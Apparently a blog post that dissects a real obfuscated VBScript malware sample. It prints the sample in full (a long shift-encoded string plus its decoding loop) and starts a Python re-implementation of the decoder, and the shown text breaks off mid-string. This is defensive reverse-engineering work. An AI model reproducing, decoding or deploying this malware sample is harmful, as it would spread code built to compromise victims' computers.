Dissecting a Visual Basic Malware, a Hands-On Approach to Reverse Engineering
On January 5, 2022, my brother asked for my help in reverse engineering a strange malware that had infected his client's computer. As the new year began, he turned to me for assistance with this technical task.
dim tcWKOUISRPTCiyzFzuwhUqdhgKJCUQUsKUboqeWJpPeqmAOIkkIokOEOTRUSNdCqUibloruYy tcWKOUISRPTCiyzFzuwhUqdhgKJCUQUsKUboqeWJpPeqmAOIkkIokOEOTRUSNdCqUibloruYy = "ܖܲݞݓݔݓݑݨݥݎܱܟܠۼ۹ܾݝݔݡݡݞݡݡݔݢݤݜݔݝݔݧݣۼ۹ۼ۹ݙܬݐݡݡݐݨܗܑ݆݂ݒݡݘݟݣܝ݂ݗݔݛݛܑܛܑ݂ݒݡݘݟݣݘݝݖܝܵݘݛݔ݂ݨݢݣݔݜܾݑݙݔݒݣܑܛܑ݂ݗݔݛݛܝܰݟݟݛݘݒݐݣݘݞݝܑܛܑܼݘݒݡݞݢݞݕݣܝܑܼܻܷ݇݃݃ܿܘۼ۹ݖܬݐݡݡݐݨܗܑܑܷ݄ܺܲܛܑܑܷܻܼܺܛܑܷ݄ܺܲݥݦܟݡݜܑܛܑ݂ݞݕݣݦݐݡݔܼݘݒݡݞݢݞݕݣ݆ݘݝݓݞݦݢܲݤݡݡݔݝݣ݅ݔݡݢݘݞݝ݁ݤݝܑܛܑܷܻܼ݂ܾ݆ܴܺܵ݃ܰ݁ܲݛݐݢݢݔݢܑܛܑܴ݁ܶݎܑ݂݉ܛܑݓݔݕݐݤݛݣݘݒݞݝܑܘۼ۹ݨܬݐݡݡݐݨܗܑݦݘݝݜݖݜݣݢܩܑܛܑݦݘݝܢܡݎݛݞݖݘݒݐݛݓݘݢݚܑܛܑ݆ݘݝܢܡݎܾݟݔݡݐݣݘݝݖ݂ݨݢݣݔݜܑܛܑݦݘݝݜݖݜݣݢܩݛݞݒݐݛݗݞݢݣݡݞݞݣݢݔݒݤݡݘݣݨݒݔݝݣݔݡܑܛܑܰݝݣݘ݅ݘݡݤݢܿݡݞݓݤݒݣܑܘۼ۹ۼ۹ݕݤݝݒݣݘݞݝݖݞܗݜܘۼ۹ݘݕݜܬܣݣݗݔݝۼ۹݃ܬܑݦݘݝݜݖݜݣݢܩݛݞݒݐݛݗݞݢݣݡݞݞݣݢݔݒݤݡݘݣݨݒݔݝݣݔݡܑۼ۹݂ݔݣܱܬܶݔݣܾݑݙݔݒݣܗݨܗܢܘܘܝܸݝݢݣݐݝݒݔݢܾݕܗݨܗܣܘܘۼ۹ݕݞݡݔݐݒݗݐݘݝݑۼ۹ݖݞܬݐܝݓݘݢݟݛݐݨܽݐݜݔۼ۹ݔݧݘݣݕݞݡۼ۹ݝݔݧݣۼ۹݂ݔݣܱܬܶݔݣܾݑݙݔݒݣܗݨܗܢܘܕܑܡܑܘܝܸݝݢݣݐݝݒݔݢܾݕܗݨܗܣܘܘۼ۹ݕݞݡݔݐݒݗݐݘݝݑۼ۹ݖݞܬݐܝݓݘݢݟݛݐݨܽݐݜݔۼ۹ݔݧݘݣݕݞݡۼ۹ݝݔݧݣۼ۹ݘݕݖݞܬܑܑݣݗݔݝݖݞܬܑܽݞݣܜݕݞݤݝݓܑۼ۹ݔݛݢݔۼ۹݂ݔݣܱܬܶݔݣܾݑݙݔݒݣܗݨܗܟܘܘܝܸݝݢݣݐݝݒݔݢܾݕܗݨܗݜܘܘۼ۹ݕݞݡݔݐݒݗݐݘݝݑۼ۹ݘݕݜܬܠݣݗݔݝۼ۹ݖݞܬݐܝݥݞݛݤݜݔݢݔݡݘݐݛݝݤݜݑݔݡۼ۹ݔݛݢݔݘݕݜܬܡݣݗݔݝۼ۹ݖݞܬݐܝݒݐݟݣݘݞݝۼ۹ݔݝݓݘݕۼ۹ݔݧݘݣݕݞݡۼ۹ݝݔݧݣۼ۹ݔݝݓݘݕۼ۹ݔݝݓݕݤݝݒݣݘݞݝۼ۹ۼ۹ݢݔݣݦܬ݆݂ݒݡݘݟݣۼ۹ݢݔݣݢݗܬܲݡܗܟܘۼ۹ݢݔݣݕݢܬܲݡܗܠܘۼ۹ۼ۹ܵݤݝݒݣݘݞݝܲݡܗܽܘۼ۹݂ݔݣܲݡܬܲݡݔݐݣݔܾݑݙݔݒݣܗݙܗܽܘܘۼ۹ܴݝݓܵݤݝݒݣݘݞݝۼ۹ۼ۹ݕݤݝݒݣݘݞݝܴݧܗݢܘۼ۹ܴݧܬݢݗܝܴݧݟݐݝݓܴݝݥݘݡݞݝݜݔݝݣ݂ݣݡݘݝݖݢܗܑܔܑܕݢܕܑܔܑܘۼ۹ݔݝݓݕݤݝݒݣݘݞݝۼ۹ۼ۹ݕݤݝݒݣݘݞݝܿݣܗܲܛܰܘۼ۹ܿݣܬܑܑۼ۹݂ݔݣ݇ܬܲݡܗܢܘۼ۹݇ܝܾݟݔݝܑܑܾ݂ܿ݃ܛܑݗݣݣݟܩܞܞݗݞݤݢݣݡݘݚݞܝݓݨݝݤܝݝݔݣܩܦܦܤܣܞܑܕܲܛݕݐݛݢݔۼ۹݇ܝݢݔݣݡݔݠݤݔݢݣݗݔݐݓݔݡܑ݄ݢݔݡܜܰݖݔݝݣܩܑܛݝݕۼ۹݇ܝݢݔݝݓܰۼ۹ܿݣܬ݇ܝݡݔݢݟݞݝݢݔݣݔݧݣۼ۹ݔݝݓݕݤݝݒݣݘݞݝۼ۹ۼ۹ܵݤݝݒݣݘݞݝݝݕۼ۹ݝݕܬܑܑۼ۹ݘܬݖݞܗܠܘۼ۹ݢܬ݅ܽܕܑݎܑܕݘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݔݧܗܑܑܾܼ݄ܴܼܴܲܿ݃݁ܽܰܘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݔݧܗܑܑ݄݂ܴܼܴ݁ܽܰܘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݖݞܗܡܘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݖݞܗܣܘۼ۹ݝݕܬݝݕܕݢܕݒܕݒܕݝݣܕݒܕݤܕݒۼ۹ܴݝݓܵݤݝݒݣݘݞݝۼ۹ۼ۹݂ݤݑܽݢۼ۹ݞݝݔݡݡݞݡݡݔݢݤݜݔݝݔݧݣۼ۹ݓݡܬݔݧܗܑܰݟݟܳݐݣݐܑܘܕܲܕݦݝۼ۹ݕݢܝܲݞݟݨܵݘݛݔݕݤܛݓݡܛݣݡݤݔۼ۹ݢݗܝݡݤݝܑݢݒݗݣݐݢݚݢܞݒݡݔݐݣݔܞݢݒݜݘݝݤݣݔܞݜݞܠܞݣݝ݂ݚݨݟݔܞݣݡܑܕܲݗݡ݆ܗܢܣܘܕݓݡܛݕݐݛݢݔۼ۹ݢݗܝݡݔݖݦݡݘݣݔݖܗܟܘܕݖܗܢܘܕܑ݄݉݃ܺܟܼ݉ܡܑ݂݄ܛܲݗܕݓݡܕܲݗܛݖܗܤܘۼ۹ݕݢܝݒݞݟݨݕݘݛݔݕݤܛܲݡܗܡܘܝܽݐݜݔ݂ݟݐݒݔܗܕܷܦܘܝ݂ݔݛݕܝܿݐݣݗܕܲܕݦݝܛݣݡݤݔۼ۹ݔݝݓ݂ݤݑۼ۹ۼ۹ݓݡܬݔݧܗܑܰݟݟܳݐݣݐܑܘܕܲܕݦݝۼ۹ۼ۹ݢݤݑݢݟݡۼ۹ݞݝݔݡݡݞݡݡݔݢݤݜݔݝݔݧݣۼ۹ݕݞݡݔݐݒݗݓݡݘݝݕݢܝݓݡݘݥݔݢۼ۹ݓݟܬݓݡܝݟݐݣݗܕݒۼ۹ݘݕݓݡܝݘݢݡݔݐݓݨܬݣݡݤݔݣݗݔݝۼ۹ݘݕݓݡܝݓݡݘݥݔݣݨݟݔܬܠݣݗݔݝۼ۹ݕݢܝݒݞݟݨݕݘݛݔݕݤܛݓݟܕݦݝܛݣݡݤݔۼ۹ݘݕݕݢܝݕݘݛݔݔݧݘݢݣݢܗݓݟܕݦݝܘݣݗݔݝۼ۹ݕݢܝݖݔݣݕݘݛݔܗݓݟܕݦݝܘܝݐݣݣݡݘݑݤݣݔݢܬܡܚܣۼ۹ݔݝݓݘݕۼ۹ݕݞݡݔݐݒݗݕݘݘݝݕݢܝݖݔݣݕݞݛݓݔݡܗݓݟܘܝݕݘݛݔݢۼ۹ݘݕݘݝݢݣݡܗݕݘܝݝݐݜݔܛܑܝܑܘݣݗݔݝۼ۹ݘݕݛݒݐݢݔܗݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܗݤݑݞݤݝݓܗݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܘܘܘܫܭܑݛݝݚܑݣݗݔݝۼ۹ݕݘܝݐݣݣݡݘݑݤݣݔݢܬܡܚܣۼ۹ݘݕݤݒݐݢݔܗݕݘܝݝݐݜݔܘܫܭݤݒݐݢݔܗݦݝܘݣݗݔݝۼ۹ݦݘݣݗݢݗܝݒݡݔݐݣݔݢݗݞݡݣݒݤݣܗݓݟܕݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܗܟܘܕܑܝݛݝݚܑܘۼ۹ܝݦݘݝݓݞݦݢݣݨݛݔܬܦۼ۹ܝݣݐݡݖݔݣݟݐݣݗܬܑݒݜݓܝݔݧݔܑۼ۹ܝݐݡݖݤݜݔݝݣݢܬܑܞݒݢݣݐݡݣܑܕݡݔݟݛݐݒݔܗݦݝܛܑܑܛݒݗܕܑܑܕݒݗܘܕܑܕݢݣݐݡݣܑܕݡݔݟݛݐݒݔܗݕݘܝݝݐݜݔܛܑܑܛݒݗܕܑܑܕݒݗܘܕܑܕݔݧݘݣܑۼ۹ݕݘݒܬݢݗܝݡݔݖݡݔݐݓܗݖܗܣܘܕݢݗܝݡݔݖݡݔݐݓܗݖܗܣܘܕܑܝܑܕݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܗݤݑݞݤݝݓܗݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܘܘܕݒܘܕݖܗܥܘܘۼ۹ݘݕݘݝݢݣݡܗݘݒݞݝݛݞݒݐݣݘݞݝܛܑܛܑܘܬܟݣݗݔݝۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝܬݕݘܝݟݐݣݗۼ۹ݔݛݢݔۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝܬݕݘݒۼ۹ݔݝݓݘݕۼ۹ܝݢݐݥݔܗܘۼ۹ݔݝݓݦݘݣݗۼ۹ݔݝݓݘݕۼ۹ݔݝݓݘݕۼ۹ݔݝݓݘݕۼ۹ݝݔݧݣۼ۹ݕݞݡݔݐݒݗݕݞݘݝݕݢܝݖݔݣݕݞݛݓݔݡܗݓݟܘܝݢݤݑݕݞݛݓݔݡݢۼ۹ݕݞܝݐݣݣݡݘݑݤݣݔݢܬܡܚܣۼ۹ݦݘݣݗݢݗܝݒݡݔݐݣݔݢݗݞݡݣݒݤݣܗݓݟܕݕݞܝݝݐݜݔܕܑܝݛݝݚܑܘۼ۹ܝݦݘݝݓݞݦݢݣݨݛݔܬܦۼ۹ܝݣݐݡݖݔݣݟݐݣݗܬܑݒݜݓܝݔݧݔܑۼ۹ܝݐݡݖݤݜݔݝݣݢܬܑܞݒݢݣݐݡݣܑܕݡݔݟݛݐݒݔܗݦݝܛܑܑܛݒݗܕܑܑܕݒݗܘܕܑܕݢݣݐݡݣݔݧݟݛݞݡݔݡܑܕݡݔݟݛݐݒݔܗݕݞܝݝݐݜݔܛܑܑܛݒݗܕܑܑܕݒݗܘܕܑܕݔݧݘݣܑۼ۹ݕݘݒܬݢݗܝݡݔݖݡݔݐݓܗܑܷܻܼܺݢݞݕݣݦݐݡݔݒݛݐݢݢݔݢݕݞݛݓݔݡܑܕݖܗܥܘܘۼ۹ݘݕݘݝݢݣݡܗܝݘݒݞݝݛݞݒݐݣݘݞݝܛܑܛܑܘܬܟݣݗݔݝۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝܬݕݞܝݟݐݣݗۼ۹ݔݛݢݔۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝܬݕݘݒۼ۹ݔݝݓݘݕۼ۹ܝݢݐݥݔܗܘۼ۹ݔݝݓݦݘݣݗۼ۹ݝݔݧݣۼ۹ݔݝݓݘݕۼ۹ݔݝݓݘݕۼ۹ݝݔݧݣۼ۹ݔݡݡܝݒݛݔݐݡۼ۹ݔݝݓݢݤݑۼ۹ۼ۹ۼ۹ۼ۹ݥݝܬܑ݆ݘݝݓݞݦݢܑۼ۹݄ܬܑܑۼ۹ۼ۹ݒݗܬݒݗݡݦܗܢܣܘۼ۹ݒܬݒݗݡݦܗܨܡܘۼ۹ݕݤܬݦܝݢݒݡݘݟݣݕݤݛݛݝݐݜݔۼ۹ݦݝܬݦܝݢݒݡݘݟݣݝݐݜݔۼ۹ܽ݃ܬܑܽݞܑۼ۹ݘݕݕݢܝݕݘݛݔݔݧݘݢݣݢܗݔݧܗܑ݆ݘݝݓݘݡܑܘܕܑܼݘݒݡݞݢݞݕݣܝܴܽ݃ܵݡݐݜݔݦݞݡݚݥܡܝܟܝܤܟܦܡܦݥݑݒܝݔݧݔܑܘݣݗݔݝۼ۹ܽ݃ܬܑ݈ݔݢܑۼ۹ݔݝݓݘݕۼ۹ۼ۹݄ܬݢݗܝݡݔݖݡݔݐݓܗݖܗܡܘܘۼ۹ݘݕ݄ܬܑܑݣݗݔݝۼ۹ݘݕݜݘݓܗݕݤܛܡܘܬܑܩܑܕݦݝݣݗݔݝۼ۹݄ܬܑܑ݄ܴ݃݁ۼ۹ݢݗܝݡݔݖݦݡݘݣݔݖܗܡܘܛ݄ܛݖܗܤܘۼ۹ݔݛݢݔۼ۹݄ܬܑܑܻ݂ܴܵܰۼ۹ݢݗܝݡݔݖݦݡݘݣݔݖܗܡܘܛ݄ܛݖܗܤܘۼ۹ݔݝݓݘݕۼ۹ݔݝݓݘݕۼ۹ۼ۹ܽݢۼ۹ݢݟݛܬܑݫ݅ݫܑۼ۹ݦݗݘݛݔݣݡݤݔۼ۹ݢܬݢݟݛݘݣܗܿݣܗܑ݅ݡݔܑܛܑܑܘܛݢݟݛܘۼ۹ݢݔݛݔݒݣݒݐݢݔݢܗܟܘۼ۹ݒݐݢݔܑݔݧݒܑۼ۹ݢݐܬݢܗܠܘۼ۹ݔݧݔݒݤݣݔݢݐۼ۹ݒݐݢݔܑ݂ݒܑۼ۹ݢܡܬܴݧܗܑݣݔݜݟܑܘܕܑܑܕݢܗܡܘۼ۹ݢݔݣݦݡܬݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݢܡܛܡܛ݃ݡݤݔܘۼ۹ݦݡܝ݆ݡݘݣݔݢܗܠܘۼ۹ݦݡܝܲݛݞݢݔܗܘۼ۹ݢݗܝݡݤݝݢܡܛܥۼ۹ݒݐݢݔܑܑ݁ܵۼ۹ݢܡܬܴݧܗܑݣݔݜݟܑܘܕܑܑܕݢܗܡܘۼ۹ݢݔݣݦݡܬݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݢܡܛܡܛ݃ݡݤݔܘۼ۹ݦݡܝ݆ݡݘݣݔݢܗܠܘۼ۹ݦݡܝܲݛݞݢݔܗܘۼ۹ݢݗܝݡݤݝݢܡۼ۹ݒݐݢݔܑ݁ݔݝܑۼ۹ݢݔݣݦݡܬݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݕݤܛܠܘۼ۹ݕܬݦݡܝ݁ݔݐݓܰݛݛۼ۹ݦݡܝݒݛݞݢݔܗܘۼ۹ݕܬݡݔݟݛݐݒݔܗݕܛݒݗܕݥݝܕݒݗܛݒݗܕݢܗܠܘܕݒݗܘۼ۹ݢݔݣݦݡܬݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݕݤܛܡܛݕݐݛݢݔܘۼ۹ݦݡܝ݆ݡݘݣݔݕۼ۹ݦݡܝݒݛݞݢݔܗܘۼ۹ݒݐݢݔܑ݄ݟܑۼ۹ݢݔݣݦݡܬݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݕݤܛܡܛݕݐݛݢݔܘۼ۹ݢܗܠܘܬݡݔݟݛݐݒݔܗݢܗܠܘܛܑݫ݄ݫܑܛܑݫ݅ݫܑܘۼ۹ݦݡܝ݆ݡݘݣݔݢܗܠܘۼ۹ݦݡܝܲݛݞݢݔܗܘۼ۹ݢݗܝݡݤݝܑݦݢݒݡݘݟݣܝݔݧݔܞܞܑܱܕݒݗܕݕݤܕݒݗܛܥۼ۹ݦܝݠݤݘݣۼ۹ݒݐݢݔܑܲݛܑۼ۹݆ܝݠݤݘݣۼ۹ݒݐݢݔܑ݄ݝܑۼ۹݂ܗܠܘܬݡݔݟݛݐݒݔܗ݂ܗܠܘܛܑܔݕܑܛݕݤܘۼ۹݂ܗܠܘܬݡݔݟݛݐݒݔܗ݂ܗܠܘܛܑܔݝܑܛݦݝܘۼ۹݂ܗܠܘܬݡݔݟݛݐݒݔܗ݂ܗܠܘܛܑܔݢݕݓݡܑܛݓݡܘۼ۹ݔݧݔݒݤݣݔ݂ܗܠܘۼ۹ݦܝݠݤݘݣۼ۹ݔݝݓݢݔݛݔݒݣۼ۹݆ܝ݂ݛݔݔݟܥܟܟܟۼ۹݂ݟݡۼ۹ݦݔݝݓ" QhabtGxPVSmqaodFuleiyhMdMORySQPKnEsCXZoecOhKXInmYYJkZyGiPdBJHiBTHICAOhhOzZhDBVFLYVGxNRf = "" Dim wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk = 0 dim mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF = 0 dim CSPCBHxJqYLpeDlsoMVtwtJREUYqwAUQgiZBRnxppFbMsrHCxajcaGGBEaKjPBpbfnRatfqhDmflLNKFLKlVpHl dim qwsUAtkNvyFxPLCTpPFcyKJalLKiStlbmCGZGEXTqqKbxqDxytkvmrpOgXcsMADtfKuaecbWffDJndqogONubFu CSPCBHxJqYLpeDlsoMVtwtJREUYqwAUQgiZBRnxppFbMsrHCxajcaGGBEaKjPBpbfnRatfqhDmflLNKFLKlVpHl = "HGFTYtdcyfsaty!@#FFDS" qwsUAtkNvyFxPLCTpPFcyKJalLKiStlbmCGZGEXTqqKbxqDxytkvmrpOgXcsMADtfKuaecbWffDJndqogONubFu = 0 do until mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF = len(CSPCBHxJqYLpeDlsoMVtwtJREUYqwAUQgiZBRnxppFbMsrHCxajcaGGBEaKjPBpbfnRatfqhDmflLNKFLKlVpHl) mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF = mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF + 1 qwsUAtkNvyFxPLCTpPFcyKJalLKiStlbmCGZGEXTqqKbxqDxytkvmrpOgXcsMADtfKuaecbWffDJndqogONubFu = qwsUAtkNvyFxPLCTpPFcyKJalLKiStlbmCGZGEXTqqKbxqDxytkvmrpOgXcsMADtfKuaecbWffDJndqogONubFu + AscW(mid(CSPCBHxJqYLpeDlsoMVtwtJREUYqwAUQgiZBRnxppFbMsrHCxajcaGGBEaKjPBpbfnRatfqhDmflLNKFLKlVpHl,mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF,1)) loop do until wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk = Len(tcWKOUISRPTCiyzFzuwhUqdhgKJCUQUsKUboqeWJpPeqmAOIkkIokOEOTRUSNdCqUibloruYy) wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk= wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk + 1 QhabtGxPVSmqaodFuleiyhMdMORySQPKnEsCXZoecOhKXInmYYJkZyGiPdBJHiBTHICAOhhOzZhDBVFLYVGxNRf = QhabtGxPVSmqaodFuleiyhMdMORySQPKnEsCXZoecOhKXInmYYJkZyGiPdBJHiBTHICAOhhOzZhDBVFLYVGxNRf & ChrW(AscW(Mid(tcWKOUISRPTCiyzFzuwhUqdhgKJCUQUsKUboqeWJpPeqmAOIkkIokOEOTRUSNdCqUibloruYy, wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk, 1)) - qwsUAtkNvyFxPLCTpPFcyKJalLKiStlbmCGZGEXTqqKbxqDxytkvmrpOgXcsMADtfKuaecbWffDJndqogONubFu + len(CSPCBHxJqYLpeDlsoMVtwtJREUYqwAUQgiZBRnxppFbMsrHCxajcaGGBEaKjPBpbfnRatfqhDmflLNKFLKlVpHl)) loop Wscript.Echo QhabtGxPVSmqaodFuleiyhMdMORySQPKnEsCXZoecOhKXInmYYJkZyGiPdBJHiBTHICAOhhOzZhDBVFLYVGxNRf
At first, it looks encoded. However, you can notice clear Visual Basic typed functions and variables in it, meaning it is only obfuscated. So, I opened a new Python script and started to retype the whole code with clear variable names to deeply understand the mathematical calculation of the script.
def mid(s, offset, amount):
return s[offset-1:offset+amount-1]
var5 = "HGFTYtdcyfsaty!@#FFDS"
var6 = 0
for x in range(1, len(var5)+1):
var6 += ord(mid(var5, x, 1))
var1 = "ܖܲݞݓݔݓݑݨݥݎܱܟܠۼ۹ܾݝݔݡݡݞݡݡݔݢݤݜݔݝݔݧݣۼ۹ۼ۹ݙܬݐݡݡݐݨܗܑ݆݂ݒݡݘݟݣܝ݂ݗݔݛݛܑܛܑ݂ݒݡݘݟݣݘݝݖܝܵݘݛݔ݂ݨݢݣݔݜܾݑݙݔݒݣܑܛܑ݂ݗݔݛݛܝܰݟݟݛݘݒݐݣݘݞݝܑܛܑܼݘݒݡݞݢݞݕݣܝܑܼܻܷ݇݃݃ܿܘۼ۹ݖܬݐݡݡݐݨܗܑܑܷ݄ܺܲܛܑܑܷܻܼܺܛܑܷ݄ܺܲݥݦܟݡݜܑܛܑ݂ݞݕݣݦݐݡݔܼݘݒݡݞݢݞݕݣ݆ݘݝݓݞݦݢܲݤݡݡݔݝݣ݅ݔݡݢݘݞݝ݁ݤݝܑܛܑܷܻܼ݂ܾ݆ܴܺܵ݃ܰ݁ܲݛݐݢݢݔݢܑܛܑܴ݁ܶݎܑ݂݉ܛܑݓݔݕݐݤݛݣݘݒݞݝܑܘۼ۹ݨܬݐݡݡݐݨܗܑݦݘݝݜݖݜݣݢܩܑܛܑݦݘݝܢܡݎݛݞݖݘݒݐݛݓݘݢݚܑܛܑ݆ݘݝܢܡݎܾݟݔݡݐݣݘݝݖ݂ݨݢݣݔݜܑܛܑݦݘݝݜݖݜݣݢܩݛݞݒݐݛݗݞݢݣݡݞݞݣݢݔݒݤݡݘݣݨݒݔݝݣݔݡܑܛܑܰݝݣݘ݅ݘݡݤݢܿݡݞݓݤݒݣܑܘۼ۹ۼ۹ݕݤݝݒݣݘݞݝݖݞܗݜܘۼ۹ݘݕݜܬܣݣݗݔݝۼ۹݃ܬܑݦݘݝݜݖݜݣݢܩݛݞݒݐݛݗݞݢݣݡݞݞݣݢݔݒݤݡݘݣݨݒݔݝݣݔݡܑۼ۹݂ݔݣܱܬܶݔݣܾݑݙݔݒݣܗݨܗܢܘܘܝܸݝݢݣݐݝݒݔݢܾݕܗݨܗܣܘܘۼ۹ݕݞݡݔݐݒݗݐݘݝݑۼ۹ݖݞܬݐܝݓݘݢݟݛݐݨܽݐݜݔۼ۹ݔݧݘݣݕݞݡۼ۹ݝݔݧݣۼ۹݂ݔݣܱܬܶݔݣܾݑݙݔݒݣܗݨܗܢܘܕܑܡܑܘܝܸݝݢݣݐݝݒݔݢܾݕܗݨܗܣܘܘۼ۹ݕݞݡݔݐݒݗݐݘݝݑۼ۹ݖݞܬݐܝݓݘݢݟݛݐݨܽݐݜݔۼ۹ݔݧݘݣݕݞݡۼ۹ݝݔݧݣۼ۹ݘݕݖݞܬܑܑݣݗݔݝݖݞܬܑܽݞݣܜݕݞݤݝݓܑۼ۹ݔݛݢݔۼ۹݂ݔݣܱܬܶݔݣܾݑݙݔݒݣܗݨܗܟܘܘܝܸݝݢݣݐݝݒݔݢܾݕܗݨܗݜܘܘۼ۹ݕݞݡݔݐݒݗݐݘݝݑۼ۹ݘݕݜܬܠݣݗݔݝۼ۹ݖݞܬݐܝݥݞݛݤݜݔݢݔݡݘݐݛݝݤݜݑݔݡۼ۹ݔݛݢݔݘݕݜܬܡݣݗݔݝۼ۹ݖݞܬݐܝݒݐݟݣݘݞݝۼ۹ݔݝݓݘݕۼ۹ݔݧݘݣݕݞݡۼ۹ݝݔݧݣۼ۹ݔݝݓݘݕۼ۹ݔݝݓݕݤݝݒݣݘݞݝۼ۹ۼ۹ݢݔݣݦܬ݆݂ݒݡݘݟݣۼ۹ݢݔݣݢݗܬܲݡܗܟܘۼ۹ݢݔݣݕݢܬܲݡܗܠܘۼ۹ۼ۹ܵݤݝݒݣݘݞݝܲݡܗܽܘۼ۹݂ݔݣܲݡܬܲݡݔݐݣݔܾݑݙݔݒݣܗݙܗܽܘܘۼ۹ܴݝݓܵݤݝݒݣݘݞݝۼ۹ۼ۹ݕݤݝݒݣݘݞݝܴݧܗݢܘۼ۹ܴݧܬݢݗܝܴݧݟݐݝݓܴݝݥݘݡݞݝݜݔݝݣ݂ݣݡݘݝݖݢܗܑܔܑܕݢܕܑܔܑܘۼ۹ݔݝݓݕݤݝݒݣݘݞݝۼ۹ۼ۹ݕݤݝݒݣݘݞݝܿݣܗܲܛܰܘۼ۹ܿݣܬܑܑۼ۹݂ݔݣ݇ܬܲݡܗܢܘۼ۹݇ܝܾݟݔݝܑܑܾ݂ܿ݃ܛܑݗݣݣݟܩܞܞݗݞݤݢݣݡݘݚݞܝݓݨݝݤܝݝݔݣܩܦܦܤܣܞܑܕܲܛݕݐݛݢݔۼ۹݇ܝݢݔݣݡݔݠݤݔݢݣݗݔݐݓݔݡܑ݄ݢݔݡܜܰݖݔݝݣܩܑܛݝݕۼ۹݇ܝݢݔݝݓܰۼ۹ܿݣܬ݇ܝݡݔݢݟݞݝݢݔݣݔݧݣۼ۹ݔݝݓݕݤݝݒݣݘݞݝۼ۹ۼ۹ܵݤݝݒݣݘݞݝݝݕۼ۹ݝݕܬܑܑۼ۹ݘܬݖݞܗܠܘۼ۹ݢܬ݅ܽܕܑݎܑܕݘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݔݧܗܑܑܾܼ݄ܴܼܴܲܿ݃݁ܽܰܘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݔݧܗܑܑ݄݂ܴܼܴ݁ܽܰܘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݖݞܗܡܘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݖݞܗܣܘۼ۹ݝݕܬݝݕܕݢܕݒܕݒܕݝݣܕݒܕݤܕݒۼ۹ܴݝݓܵݤݝݒݣݘݞݝۼ۹ۼ۹݂ݤݑܽݢۼ۹ݞݝݔݡݡݞݡݡݔݢݤݜݔݝݔݧݣۼ۹ݓݡܬݔݧܗܑܰݟݟܳݐݣݐܑܘܕܲܕݦݝۼ۹ݕݢܝܲݞݟݨܵݘݛݔݕݤܛݓݡܛݣݡݤݔۼ۹ݢݗܝݡݤݝܑݢݒݗݣݐݢݚݢܞݒݡݔݐݣݔܞݢݒݜݘݝݤݣݔܞݜݞܠܞݣݝ݂ݚݨݟݔܞݣݡܑܕܲݗݡ݆ܗܢܣܘܕݓݡܛݕݐݛݢݔۼ۹ݢݗܝݡݔݖݦݡݘݣݔݖܗܟܘܕݖܗܢܘܕܑ݄݉݃ܺܟܼ݉ܡܑ݂݄ܛܲݗܕݓݡܕܲݗܛݖܗܤܘۼ۹ݕݢܝݒݞݟݨݕݘݛݔݕݤܛܲݡܗܡܘܝܽݐݜݔ݂ݟݐݒݔܗܕܷܦܘܝ݂ݔݛݕܝܿݐݣݗܕܲܕݦݝܛݣݡݤݔۼ۹ݔݝݓ݂ݤݑۼ۹ۼ۹ݓݡܬݔݧܗܑܰݟݟܳݐݣݐܑܘܕܲܕݦݝۼ۹ۼ۹ݢݤݑݢݟݡۼ۹ݞݝݔݡݡݞݡݡݔݢݤݜݔݝݔݧݣۼ۹ݕݞݡݔݐݒݗݓݡݘݝݕݢܝݓݡݘݥݔݢۼ۹ݓݟܬݓݡܝݟݐݣݗܕݒۼ۹ݘݕݓݡܝݘݢݡݔݐݓݨܬݣݡݤݔݣݗݔݝۼ۹ݘݕݓݡܝݓݡݘݥݔݣݨݟݔܬܠݣݗݔݝۼ۹ݕݢܝݒݞݟݨݕݘݛݔݕݤܛݓݟܕݦ